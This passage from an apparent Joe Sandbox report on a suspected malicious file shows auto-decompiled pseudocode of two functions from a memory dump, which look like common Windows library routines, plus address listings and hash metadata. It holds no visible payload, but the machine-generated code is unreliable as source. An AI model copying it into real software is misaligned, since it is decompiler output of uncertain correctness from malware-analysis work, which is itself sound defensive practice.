				void* _t195;
				signed char _t199;
				intOrPtr* _t208;
				intOrPtr _t209;
				intOrPtr _t210;
				intOrPtr _t211;
				intOrPtr* _t212;
				intOrPtr* _t213;
				void* _t233;
				signed int _t236;
				intOrPtr _t242;
				signed int _t243;
				signed int _t246;
				signed int _t250;
				intOrPtr _t253;
				signed int _t255;
				intOrPtr _t260;
				signed int _t261;

				_v20 = __edx;
				_t251 = _a8;
				_v16 = __ecx;
				_v12 = 1;
				if(_a8 != 0) {
					E33421933(_t251, _a12,  &_a4,  &_v12);
				}
				while(1) {
					_t236 =  *0x7ffe0018;
					_t246 =  *0x7FFE0014;
					_t156 =  *((intOrPtr*)(0x7ffe001c));
					if(_t236 == _t156) {
						break;
					}
					asm("pause");
				}
				_t260 = _v16;
				_v56 = _t246;
				_v52 = _t236;
				if( *((intOrPtr*)(_t260 + 0x28)) != 2) {
					__eflags =  *((intOrPtr*)(_t260 + 0x28)) - 3;
					if( *((intOrPtr*)(_t260 + 0x28)) != 3) {
						_v40 = _v40 & 0x00000000;
						_v36 = _v36 & 0x00000000;
						L3337BC50( &_v40);
						_v48 = _v40;
						_v44 = _v36;
					} else {
						asm("rdtsc");
						_v48 = _t156;
						_v44 = _t246;
					}
					goto L7;
				} else {
					while(1) {
						_t236 =  *0x7ffe0018;
						_t250 =  *0x7FFE0014;
						if(_t236 ==  *0x7ffe001c) {
							break;
						}
						asm("pause");
					}
					_t260 = _v16;
					_v48 = _t250;
					_v44 = _t236;
					L7:
					_t164 = L33365D90(_t236,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x188 + _a4 * 4);
					_t253 = _a8;
					_t233 = _t164;
					if(_t233 == 0) {
						L28:
						return 0;
					}
					_t169 = L33365D90(_t236,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _a4 << 2);
					 *(_t233 + 0x178) = _t169;
					if(_t169 == 0) {
						L46:
						_t261 = 0;
						__eflags = 0;
						L47:
						__eflags =  *(_t233 + 0x64);
						if( *(_t233 + 0x64) != 0) {
							_push( *(_t233 + 0x64));
							E33392A80();
							 *(_t233 + 0x64) = _t261;
						}
						__eflags =  *(_t233 + 0x60);
						if( *(_t233 + 0x60) != 0) {
							_push( *(_t233 + 0x60));
							E33392A80();
							 *(_t233 + 0x60) = _t261;
						}
						_t170 =  *(_t233 + 0x164);
						__eflags = _t170;
						if(_t170 != 0) {
							E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t261, _t170);
						}
						_t171 =  *(_t233 + 0x178);
						__eflags = _t171;
						if(_t171 != 0) {
							E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t261, _t171);
						}
						E3338E4BC(_t233);
						_t147 = _t233 + 0x6c; // 0x6c
						E33363B90(_t147);
						_t148 = _t233 + 0x74; // 0x74
						E33363B90(_t148);
						_t149 = _t233 + 0x7c; // 0x7c
						E33363B90(_t149);
						E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t261, _t233);
						goto L28;
					}
					if(_t253 != 0) {
						_t238 = _t233;
						_t254 = _v12;
						_t187 = E334217BC(_t233, _v12, _t253, _a12);
						__eflags = _t187;
						if(_t187 != 0) {
							goto L46;
						}
						_t191 = L33365D90(_t238,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, (_t254 & 0x0000ffff) * 0xc);
						 *(_t233 + 0x164) = _t191;
						__eflags = _t191;
						if(__eflags == 0) {
							goto L46;
						}
						_t255 = _a4;
						L12:
						_t192 =  *(_t260 + 0x30);
						_t274 = _t192;
						if(_t192 != 0) {
							__eflags = _t192 - 0x4000;
							if(__eflags > 0) {
								 *(_t260 + 0x30) = 0x4000;
								_t192 = 0x4000;
							}
							_t193 = _t192 << 0xa;
						} else {
							_t193 = 0x1000;
						}
						 *(_t233 + 0x8c) = _t193;
						_t32 = _t233 + 0x6c; // 0x6c
						_push( *((intOrPtr*)(_t260 + 0x94)));
						_t195 = E333740F0(_t233, _t255, _t260, _t274);
						_t275 = _t195;
						if(_t195 == 0 || E33391A3B(_t260,  *((intOrPtr*)(_t260 + 0x60)), _t275,  &_v28) != 0) {
							goto L46;
						} else {
							if(( *(_t260 + 0x40) & 0x00004000) != 0) {
								 *((intOrPtr*)(_t233 + 0x11c)) = 0x334441d8;
							} else {
								if(( *(_t260 + 0x40) & 0x00008000) != 0) {
									_t125 = _t233 + 0x120; // 0x120
									 *((intOrPtr*)(_t233 + 0x11c)) = _t125;
								}
							}
							_t241 = 0x800;
							 *((intOrPtr*)(_t233 + 0x14)) = _v20;
							 *(_t233 + 0x88) = _t255;
							 *(_t233 + 0xd4) = 0x800;
							 *((intOrPtr*)(_t233 + 0x2c)) = 0xffff;
							 *((intOrPtr*)(_t233 + 0x28)) = 0xc00d0000;
							 *((intOrPtr*)(_t233 + 0x24)) = 0xc0120000;
							_t199 =  *(_t260 + 0x40);
							if((_t199 & 0x00000400) != 0) {
								_t241 = 0xc00;
								 *(_t233 + 0xd4) = 0xc00;
								goto L22;
							} else {
								if((_t199 & 0x00000002) == 0) {
									__eflags = _t199 & 0x00000008;
									if((_t199 & 0x00000008) == 0) {
										__eflags = _t199 & 0x00000001;
										if((_t199 & 0x00000001) == 0) {
											L22:
											_t242 = _v16;
											 *(_t233 + 0xd4) =  *(_t260 + 0x40) & 0x34133024 | _t241;
											 *((intOrPtr*)(_t233 + 0x118)) =  *((intOrPtr*)(_t260 + 0x6c));
											 *((intOrPtr*)(_t233 + 0xa0)) =  *((intOrPtr*)(_t233 + 0x9c));
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											_t261 = 0;
											 *((intOrPtr*)(_t233 + 0xd0)) =  *((intOrPtr*)(_t242 + 0x3c));
											 *((intOrPtr*)(_t233 + 0x94)) =  *((intOrPtr*)(_t242 + 0x38));
											 *((intOrPtr*)(_t233 + 0x98)) =  *((intOrPtr*)(_t242 + 0x34));
											_t73 = _t233 + 0xa4; // 0xa4
											_t208 = _t73;
											 *((intOrPtr*)(_t208 + 4)) = _t208;
											 *_t208 = _t208;
											_t75 = _t233 + 0xb4; // 0xb4
											_t209 = _t75;
											 *((intOrPtr*)(_t233 + 0xb4)) = 0;
											 *((intOrPtr*)(_t233 + 0xac)) = _t209;
											 *((intOrPtr*)(_t233 + 0xb0)) = _t209;
											_t79 = _t233 + 0xc0; // 0xc0
											_t210 = _t79;
											 *((intOrPtr*)(_t233 + 0xc0)) = 0;
											 *((intOrPtr*)(_t233 + 0xb8)) = _t210;
											 *((intOrPtr*)(_t233 + 0xbc)) = _t210;
											_t83 = _t233 + 0xcc; // 0xcc
											_t211 = _t83;
											 *((intOrPtr*)(_t233 + 0xcc)) = 0;
											 *((intOrPtr*)(_t233 + 0xc4)) = _t211;
											 *((intOrPtr*)(_t233 + 0xc8)) = _t211;
											_t87 = _t233 + 0x14c; // 0x14c
											_t212 = _t87;
											 *((intOrPtr*)(_t212 + 4)) = _t212;
											 *_t212 = _t212;
											_t89 = _t233 + 0x154; // 0x154
											_t213 = _t89;
											 *((intOrPtr*)(_t213 + 4)) = _t213;
											 *_t213 = _t213;
											_push(0);
											 *((intOrPtr*)(_t233 + 0x10)) =  *((intOrPtr*)(_t242 + 0x28));
											_push("true");
											 *((intOrPtr*)(_t233 + 0x40)) =  *((intOrPtr*)(_t242 + 0x60));
											_push(0);
											 *((intOrPtr*)(_t233 + 0x100)) =  *((intOrPtr*)(_t242 + 0x4c));
											_t97 = _t233 + 0x60; // 0x60
											_push(0x1f0003);
											if(E33392E30() < 0) {
												goto L47;
											}
											_push(0);
											_push("true");
											_push(0);
											_push(0x1f0003);
											_t98 = _t233 + 0x64; // 0x64
											if(E33392E30() < 0) {
												goto L47;
											}
											_t99 = _t233 + 0x48; // 0x48
											E3337FBC0(_t99, 0, 0);
											 *((intOrPtr*)(_t233 + 0x44)) = 0;
											 *((intOrPtr*)(_t233 + 0xd8)) = 1;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											return _t233;
										}
										_t241 = 0x801;
										L21:
										 *(_t233 + 0xd4) = _t241;
										 *((intOrPtr*)(_t233 + 0x74)) = _v28;
										 *((intOrPtr*)(_t233 + 0x78)) = _v24;
										goto L22;
									}
									_t241 = 0x808;
									 *(_t233 + 0xd4) = 0x808;
									 *((intOrPtr*)(_t233 + 0x7c)) = _v28;
									 *((intOrPtr*)(_t233 + 0x80)) = _v24;
									goto L22;
								}
								_t241 = 0x802;
								goto L21;
							}
						}
					}
					_t255 = _a4;
					_t243 = 0;
					if(_t255 == 0) {
						goto L12;
					} else {
						goto L11;
					}
					do {
						L11:
						 *((short*)( *(_t233 + 0x178) + _t243 * 4)) = 0;
						 *( *(_t233 + 0x178) + 2 + _t243 * 4) = _t243;
						_t243 = _t243 + 1;
					} while (_t243 < _t255);
					goto L12;
				}
			}













































                                                                                                                                                                                  0x3339176f
                                                                                                                                                                                  0x33391773
                                                                                                                                                                                  0x33391777
                                                                                                                                                                                  0x3339177a
                                                                                                                                                                                  0x33391780
                                                                                                                                                                                  0x333c9b84
                                                                                                                                                                                  0x333c9b84
                                                                                                                                                                                  0x33391791
                                                                                                                                                                                  0x33391791
                                                                                                                                                                                  0x33391793
                                                                                                                                                                                  0x33391795
                                                                                                                                                                                  0x33391799
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33391a29
                                                                                                                                                                                  0x33391a29
                                                                                                                                                                                  0x3339179f
                                                                                                                                                                                  0x333917a2
                                                                                                                                                                                  0x333917a5
                                                                                                                                                                                  0x333917ac
                                                                                                                                                                                  0x333c9b8e
                                                                                                                                                                                  0x333c9b92
                                                                                                                                                                                  0x333c9ba1
                                                                                                                                                                                  0x333c9ba8
                                                                                                                                                                                  0x333c9bad
                                                                                                                                                                                  0x333c9bb5
                                                                                                                                                                                  0x333c9bbb
                                                                                                                                                                                  0x333c9b94
                                                                                                                                                                                  0x333c9b94
                                                                                                                                                                                  0x333c9b96
                                                                                                                                                                                  0x333c9b99
                                                                                                                                                                                  0x333c9b99
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333917b2
                                                                                                                                                                                  0x333917b7
                                                                                                                                                                                  0x333917b7
                                                                                                                                                                                  0x333917b9
                                                                                                                                                                                  0x333917bf
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33391a30
                                                                                                                                                                                  0x33391a30
                                                                                                                                                                                  0x333917c5
                                                                                                                                                                                  0x333917c8
                                                                                                                                                                                  0x333917cb
                                                                                                                                                                                  0x333917ce
                                                                                                                                                                                  0x333917e4
                                                                                                                                                                                  0x333917e9
                                                                                                                                                                                  0x333917ec
                                                                                                                                                                                  0x333917f0
                                                                                                                                                                                  0x33391a37
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33391a37
                                                                                                                                                                                  0x33391808
                                                                                                                                                                                  0x3339180d
                                                                                                                                                                                  0x33391815
                                                                                                                                                                                  0x333c9c7c
                                                                                                                                                                                  0x333c9c7c
                                                                                                                                                                                  0x333c9c7c
                                                                                                                                                                                  0x333c9c7e
                                                                                                                                                                                  0x333c9c7e
                                                                                                                                                                                  0x333c9c82
                                                                                                                                                                                  0x333c9c84
                                                                                                                                                                                  0x333c9c87
                                                                                                                                                                                  0x333c9c8c
                                                                                                                                                                                  0x333c9c8c
                                                                                                                                                                                  0x333c9c8f
                                                                                                                                                                                  0x333c9c93
                                                                                                                                                                                  0x333c9c95
                                                                                                                                                                                  0x333c9c98
                                                                                                                                                                                  0x333c9c9d
                                                                                                                                                                                  0x333c9c9d
                                                                                                                                                                                  0x333c9ca0
                                                                                                                                                                                  0x333c9ca6
                                                                                                                                                                                  0x333c9ca8
                                                                                                                                                                                  0x333c9cb5
                                                                                                                                                                                  0x333c9cb5
                                                                                                                                                                                  0x333c9cba
                                                                                                                                                                                  0x333c9cc0
                                                                                                                                                                                  0x333c9cc2
                                                                                                                                                                                  0x333c9ccf
                                                                                                                                                                                  0x333c9ccf
                                                                                                                                                                                  0x333c9cd6
                                                                                                                                                                                  0x333c9cdb
                                                                                                                                                                                  0x333c9cdf
                                                                                                                                                                                  0x333c9ce4
                                                                                                                                                                                  0x333c9ce8
                                                                                                                                                                                  0x333c9ced
                                                                                                                                                                                  0x333c9cf1
                                                                                                                                                                                  0x333c9d01
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c9d01
                                                                                                                                                                                  0x3339181d
                                                                                                                                                                                  0x333c9bc6
                                                                                                                                                                                  0x333c9bc9
                                                                                                                                                                                  0x333c9bd0
                                                                                                                                                                                  0x333c9bd5
                                                                                                                                                                                  0x333c9bd7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c9bef
                                                                                                                                                                                  0x333c9bf4
                                                                                                                                                                                  0x333c9bfa
                                                                                                                                                                                  0x333c9bfc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c9bfe
                                                                                                                                                                                  0x33391848
                                                                                                                                                                                  0x33391848
                                                                                                                                                                                  0x33391850
                                                                                                                                                                                  0x33391852
                                                                                                                                                                                  0x333c9c06
                                                                                                                                                                                  0x333c9c08
                                                                                                                                                                                  0x333c9c0a
                                                                                                                                                                                  0x333c9c0d
                                                                                                                                                                                  0x333c9c0d
                                                                                                                                                                                  0x333c9c0f
                                                                                                                                                                                  0x33391858
                                                                                                                                                                                  0x33391858
                                                                                                                                                                                  0x33391858
                                                                                                                                                                                  0x3339185d
                                                                                                                                                                                  0x33391863
                                                                                                                                                                                  0x33391866
                                                                                                                                                                                  0x3339186d
                                                                                                                                                                                  0x33391872
                                                                                                                                                                                  0x33391874
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33391890
                                                                                                                                                                                  0x33391897
                                                                                                                                                                                  0x333c9c17
                                                                                                                                                                                  0x3339189d
                                                                                                                                                                                  0x333918a4
                                                                                                                                                                                  0x333c9c26
                                                                                                                                                                                  0x333c9c2c
                                                                                                                                                                                  0x333c9c2c
                                                                                                                                                                                  0x333918a4
                                                                                                                                                                                  0x333918ad
                                                                                                                                                                                  0x333918b2
                                                                                                                                                                                  0x333918b5
                                                                                                                                                                                  0x333918bb
                                                                                                                                                                                  0x333918c1
                                                                                                                                                                                  0x333918c8
                                                                                                                                                                                  0x333918cf
                                                                                                                                                                                  0x333918d6
                                                                                                                                                                                  0x333918de
                                                                                                                                                                                  0x333c9c37
                                                                                                                                                                                  0x333c9c3c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333918e4
                                                                                                                                                                                  0x333918e6
                                                                                                                                                                                  0x333c9c47
                                                                                                                                                                                  0x333c9c49
                                                                                                                                                                                  0x333c9c6a
                                                                                                                                                                                  0x333c9c6c
                                                                                                                                                                                  0x33391901
                                                                                                                                                                                  0x3339190e
                                                                                                                                                                                  0x33391911
                                                                                                                                                                                  0x3339191d
                                                                                                                                                                                  0x33391929
                                                                                                                                                                                  0x3339192f
                                                                                                                                                                                  0x33391930
                                                                                                                                                                                  0x33391931
                                                                                                                                                                                  0x33391932
                                                                                                                                                                                  0x33391936
                                                                                                                                                                                  0x33391938
                                                                                                                                                                                  0x33391946
                                                                                                                                                                                  0x3339194f
                                                                                                                                                                                  0x33391955
                                                                                                                                                                                  0x33391955
                                                                                                                                                                                  0x3339195b
                                                                                                                                                                                  0x3339195e
                                                                                                                                                                                  0x33391960
                                                                                                                                                                                  0x33391960
                                                                                                                                                                                  0x33391966
                                                                                                                                                                                  0x3339196c
                                                                                                                                                                                  0x33391972
                                                                                                                                                                                  0x33391978
                                                                                                                                                                                  0x33391978
                                                                                                                                                                                  0x3339197e
                                                                                                                                                                                  0x33391984
                                                                                                                                                                                  0x3339198a
                                                                                                                                                                                  0x33391990
                                                                                                                                                                                  0x33391990
                                                                                                                                                                                  0x33391996
                                                                                                                                                                                  0x3339199c
                                                                                                                                                                                  0x333919a2
                                                                                                                                                                                  0x333919a8
                                                                                                                                                                                  0x333919a8
                                                                                                                                                                                  0x333919ae
                                                                                                                                                                                  0x333919b1
                                                                                                                                                                                  0x333919b3
                                                                                                                                                                                  0x333919b3
                                                                                                                                                                                  0x333919b9
                                                                                                                                                                                  0x333919bc
                                                                                                                                                                                  0x333919c1
                                                                                                                                                                                  0x333919c2
                                                                                                                                                                                  0x333919c8
                                                                                                                                                                                  0x333919ca
                                                                                                                                                                                  0x333919d0
                                                                                                                                                                                  0x333919d1
                                                                                                                                                                                  0x333919d7
                                                                                                                                                                                  0x333919da
                                                                                                                                                                                  0x333919e3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333919e9
                                                                                                                                                                                  0x333919ea
                                                                                                                                                                                  0x333919ec
                                                                                                                                                                                  0x333919ed
                                                                                                                                                                                  0x333919ee
                                                                                                                                                                                  0x333919f9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33391a01
                                                                                                                                                                                  0x33391a05
                                                                                                                                                                                  0x33391a0a
                                                                                                                                                                                  0x33391a12
                                                                                                                                                                                  0x33391a1e
                                                                                                                                                                                  0x33391a1f
                                                                                                                                                                                  0x33391a20
                                                                                                                                                                                  0x33391a21
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33391a21
                                                                                                                                                                                  0x333c9c72
                                                                                                                                                                                  0x333918ef
                                                                                                                                                                                  0x333918ef
                                                                                                                                                                                  0x333918f8
                                                                                                                                                                                  0x333918fe
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333918fe
                                                                                                                                                                                  0x333c9c4b
                                                                                                                                                                                  0x333c9c50
                                                                                                                                                                                  0x333c9c59
                                                                                                                                                                                  0x333c9c5f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c9c5f
                                                                                                                                                                                  0x333918ec
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333918ec
                                                                                                                                                                                  0x333918de
                                                                                                                                                                                  0x33391874
                                                                                                                                                                                  0x33391823
                                                                                                                                                                                  0x33391826
                                                                                                                                                                                  0x3339182a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3339182c
                                                                                                                                                                                  0x3339182c
                                                                                                                                                                                  0x33391834
                                                                                                                                                                                  0x3339183e
                                                                                                                                                                                  0x33391843
                                                                                                                                                                                  0x33391844
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3339182c

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 0bea1bbd205e560006ca28b2d6e485887af17c7ab6689b81e67b9237c8caa1ac
                                                                                                                                                                                  • Instruction ID: d3e026ed0a7dc1cfd80a756e3513a8cec3520d11777df526d70b9893dbea5f05
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0bea1bbd205e560006ca28b2d6e485887af17c7ab6689b81e67b9237c8caa1ac
                                                                                                                                                                                  • Instruction Fuzzy Hash: 54D104B5941605DFEB41CF68C980B8A7BE9BF09344F0580BAED09EB256DB31D905CBA0
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3336F380 Relevance: .3, Instructions: 321COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 53%
                                                                                                                                                                                  			E3336F380(signed int __ecx, signed short* __edx, signed char _a4, intOrPtr* _a8, signed int _a12) {
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				signed short* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed short* _v44;
				short _v46;
				char _v48;
				signed int _t105;
				void* _t107;
				char* _t110;
				signed int _t114;
				char* _t124;
				signed char* _t127;
				intOrPtr* _t132;
				signed short* _t138;
				signed short _t139;
				signed int _t146;
				signed int _t157;
				signed short* _t158;
				intOrPtr* _t159;
				intOrPtr _t160;
				signed int _t162;
				signed short* _t163;
				signed int _t164;
				intOrPtr _t171;
				signed int _t178;
				signed int _t190;
				signed short _t194;
				signed short _t197;
				signed short* _t200;
				intOrPtr _t201;
				signed int _t202;
				signed int _t205;
				signed int _t206;
				signed int _t209;
				signed short* _t213;
				intOrPtr _t214;
				signed short* _t215;
				signed int _t216;
				unsigned int _t218;
				signed int _t219;
				void* _t220;
				signed int _t225;
				signed int _t227;

				_t164 = __ecx;
				_t102 = __ecx;
				_v16 = __ecx;
				_t158 = __edx;
				_v28 = __edx;
				if(__ecx != 0) {
					L9:
					_t219 = 0;
					_v12 = 0;
					if(_t102 == 0) {
						L60:
						_t219 = 0x80000000;
						_v12 = 0x80000000;
						L16:
						L33362330(_t102, 0x33446668);
						_t105 = _t219 & 0x0000001f;
						_t159 =  *((intOrPtr*)(0x33445b80 + _t105 * 8));
						_t214 = 0x33445b80 + _t105 * 8;
						_v36 = _t214;
						_v24 = _t159;
						if(_t159 == _t214) {
							L49:
							_t220 = 0xc0000135;
							L30:
							E333624D0(0x33446668);
							_t215 = _v28;
							_t107 = L33363C40();
							if(_t215 == 0) {
								if(_t107 != 0) {
									_t110 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								} else {
									_t110 = 0x7ffe0384;
								}
								if( *_t110 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
									L34:
									return _t220;
								} else {
									if(L33363C40() == 0) {
										_t114 = 0x7ffe0385;
									} else {
										_t114 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
									}
									if(( *_t114 & 0x00000020) != 0) {
										_push(0);
										_push(_v16);
										_push((_t114 & 0xffffff00 | _t220 > 0x00000000) - 0x00000001 & 3);
										L84:
										_push(0);
										E333D0227(0x14a0, 0);
									}
									goto L34;
								}
							}
							if(_t107 != 0) {
								_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t124 = 0x7ffe0384;
							}
							if( *_t124 != 0) {
								if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
									goto L34;
								}
								if(L33363C40() == 0) {
									_t127 = 0x7ffe0385;
								} else {
									_t127 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t127 & 0x00000020) == 0) {
									goto L34;
								} else {
									_push(0);
									_push(_t215);
									_push((_t164 & 0xffffff00 | _t220 > 0x00000000) - 0x00000001 & 3);
									goto L84;
								}
							} else {
								goto L34;
							}
						}
						do {
							_t160 = _t159 + 0xffffffc4;
							_v40 = _t160;
							if(_t219 !=  *((intOrPtr*)(_t160 + 0x90))) {
								goto L48;
							}
							if((_a4 & 0x00000008) != 0) {
								if(( *(_t160 + 0x34) & 0x00000001) == 0) {
									goto L48;
								}
							}
							_t200 = _v28;
							if(_t200 == 0) {
								if(( *(_t160 + 0x34) & 0x10000000) != 0) {
									goto L48;
								}
								if(E33371280(_v16, _t160 + 0x2c, ?str?) != 0) {
									L27:
									_t132 =  *((intOrPtr*)(_t160 + 0x50));
									if( *((intOrPtr*)(_t132 + 0xc)) != 0xffffffff) {
										if(( *( *_t132 - 0x20) & 0x00000020) == 0) {
											asm("lock inc dword [ebx+0x9c]");
										}
									}
									_t220 = 0;
									_t164 = _a12;
									 *_a8 = _t160;
									if(_t164 != 0) {
										 *_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x50)) + 0x20));
									}
									goto L30;
								}
								goto L48;
							}
							_t164 =  *_t200 & 0x0000ffff;
							if(_t164 != ( *(_t160 + 0x24) & 0x0000ffff)) {
								goto L48;
							}
							_t138 = _t200[2];
							_t201 = _t138 + _t164;
							_v20 = _t201;
							if(_t138 >= _t201) {
								goto L27;
							}
							_t171 =  *((intOrPtr*)(_t160 + 0x28)) - _t138;
							_v32 = _t171;
							do {
								_t216 =  *_t138 & 0x0000ffff;
								_t162 =  *(_t171 + _t138) & 0x0000ffff;
								if(_t216 != _t162) {
									if(_t216 < 0x61) {
										L42:
										if(_t162 >= 0x61) {
											if(_t162 > 0x7a) {
												if( *0x33446914 == 0 || _t162 < 0xc0) {
													goto L43;
												} else {
													_t202 =  *0x33446914; // 0x7ffd0654
													_t178 =  *0x33446914; // 0x7ffd0654
													_t205 =  *0x33446914; // 0x7ffd0654
													_t201 = _v20;
													_t164 =  *((intOrPtr*)(_t205 + (( *(_t178 + (( *(_t202 + (_t162 >> 8) * 2) & 0x0000ffff) + (_t162 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t162 & 0x0000000f)) * 2)) + _t162 & 0x0000ffff;
													L44:
													if(_t216 != _t164) {
														_t219 = _v12;
														_t214 = _v36;
														goto L48;
													}
													_t171 = _v32;
													goto L25;
												}
											}
											_t164 = _t162 - 0x00000020 & 0x0000ffff;
											goto L44;
										}
										L43:
										_t164 = _t162;
										goto L44;
									}
									if(_t216 > 0x7a) {
										if( *0x33446914 != 0 && _t216 >= 0xc0) {
											_t206 =  *0x33446914; // 0x7ffd0654
											_t190 =  *0x33446914; // 0x7ffd0654
											_t209 =  *0x33446914; // 0x7ffd0654
											_t201 = _v20;
											_t194 =  *((intOrPtr*)(_t209 + (( *(_t190 + (( *(_t206 + (_t216 >> 8) * 2) & 0x0000ffff) + (_t216 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t216 & 0x0000000f)) * 2)) + _t216;
											L41:
											_t216 = _t194 & 0x0000ffff;
										}
										goto L42;
									}
									_t194 = _t216 - 0x20;
									goto L41;
								}
								L25:
								_t138 =  &(_t138[1]);
							} while (_t138 < _t201);
							_t160 = _v40;
							goto L27;
							L48:
							_t159 =  *_v24;
							_v24 = _t159;
						} while (_t159 != _t214);
						goto L49;
					}
					_t218 = ( *_t102 & 0x0000ffff) >> 1;
					_t163 =  *(_t102 + 4);
					if(_t218 == 0) {
						L15:
						if(_t219 == 0) {
							goto L60;
						}
						goto L16;
					} else {
						goto L11;
					}
					do {
						L11:
						_t225 =  *_t163 & 0x0000ffff;
						_t163 =  &(_t163[1]);
						_t218 = _t218 - 1;
						if(_t225 < 0x61) {
							L37:
							_t139 = _t225;
							goto L14;
						}
						if(_t225 > 0x7a) {
							_t164 =  *0x33446914; // 0x7ffd0654
							if(_t164 == 0 || _t225 < 0xc0) {
								goto L37;
							} else {
								_t146 =  *0x33446914; // 0x7ffd0654
								_t164 =  *0x33446914; // 0x7ffd0654
								_t139 =  *((intOrPtr*)(_t164 + (( *(_t146 + (( *(_t164 + (_t225 >> 8) * 2) & 0x0000ffff) + (_t225 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t225 & 0x0000000f)) * 2)) + _t225 & 0x0000ffff;
								goto L14;
							}
						}
						_t14 = _t225 - 0x20; // -32
						_t139 = _t14 & 0x0000ffff;
						L14:
						_t102 = _t139 & 0x0000ffff;
						_t219 = _v12 * 0x1003f + (_t139 & 0x0000ffff);
						_v12 = _t219;
					} while (_t218 != 0);
					goto L15;
				}
				_t197 = __edx[2];
				_t227 =  *__edx & 0x0000ffff;
				_t213 = _t197 - 2 + _t227;
				if(_t213 <= _t197) {
					L8:
					_v44 = _t213;
					_t164 = _t213 - _t197 & 0x0000ffff;
					_v48 = _t227 - _t164;
					_v46 =  *((intOrPtr*)(_t158 + 2)) - _t164;
					_t102 =  &_v48;
					_v16 = _t102;
					goto L9;
				}
				while(1) {
					_t157 =  *_t213 & 0x0000ffff;
					if(_t157 == 0x5c || _t157 == 0x2f) {
						break;
					}
					_t213 = _t213 - 2;
					if(_t213 > _t197) {
						continue;
					}
					goto L8;
				}
				_t213 =  &(_t213[1]);
				goto L8;
			}



















































                                                                                                                                                                                  0x3336f380
                                                                                                                                                                                  0x3336f389
                                                                                                                                                                                  0x3336f38b
                                                                                                                                                                                  0x3336f38e
                                                                                                                                                                                  0x3336f390
                                                                                                                                                                                  0x3336f397
                                                                                                                                                                                  0x3336f3ec
                                                                                                                                                                                  0x3336f3ec
                                                                                                                                                                                  0x3336f3ee
                                                                                                                                                                                  0x3336f3f3
                                                                                                                                                                                  0x333a9292
                                                                                                                                                                                  0x333a9292
                                                                                                                                                                                  0x333a9297
                                                                                                                                                                                  0x3336f43d
                                                                                                                                                                                  0x3336f442
                                                                                                                                                                                  0x3336f449
                                                                                                                                                                                  0x3336f44c
                                                                                                                                                                                  0x3336f453
                                                                                                                                                                                  0x3336f45a
                                                                                                                                                                                  0x3336f45d
                                                                                                                                                                                  0x3336f462
                                                                                                                                                                                  0x3336f5a4
                                                                                                                                                                                  0x3336f5a4
                                                                                                                                                                                  0x3336f4fd
                                                                                                                                                                                  0x3336f502
                                                                                                                                                                                  0x3336f507
                                                                                                                                                                                  0x3336f50a
                                                                                                                                                                                  0x3336f511
                                                                                                                                                                                  0x3336f5c8
                                                                                                                                                                                  0x333a93d9
                                                                                                                                                                                  0x3336f5ce
                                                                                                                                                                                  0x3336f5ce
